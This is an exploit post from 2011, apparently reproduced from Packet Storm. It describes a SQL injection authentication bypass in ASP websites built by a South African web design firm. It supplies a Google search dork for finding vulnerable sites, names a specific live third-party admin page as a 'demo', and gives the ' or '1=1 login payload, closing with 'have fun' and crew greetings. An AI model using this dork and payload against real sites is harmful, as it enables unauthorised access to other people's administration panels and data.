Sites designed by The Formula Group suffer from a remote SQL injection vulnerability that allow for authentication bypass.
92c1e0ccfe09f214e443a03351641aab4a6ccb3a2d177867a5db95b1650dc333
============================================
# Exploit Title : The Formula Group Auth bypass
# Google Dork : intext:"WEB DESIGN BY THE FORMULA"
# Date : 2011-2-10
# Author : nGa Sa Lu [ GaNgst3r ]
# Service Link : http://www.theformula.co.za/index.php#theform
# Tested on : Vista
# Platform : asp
=============================================
[+] Google Dork :
intext:"WEB DESIGN BY THE FORMULA"
[+] Admin page :
./ try searhcing admin page.
./ e.g
http://www.localhost.com/admin/
[+] Demo :
http://www.lingeriesouthafrica.co.za/admin/
[+] bypass code : [ login with ]
' or '1=1
' or '1=1
[+] have fun ^_^
########################################################
x Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros -
########################################################
x-[+] i'am ################################################
- [ dongoth ] >> [ GaNgst3r ] >> [ nGa Sa Lu ] >> x
########################################################
==================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed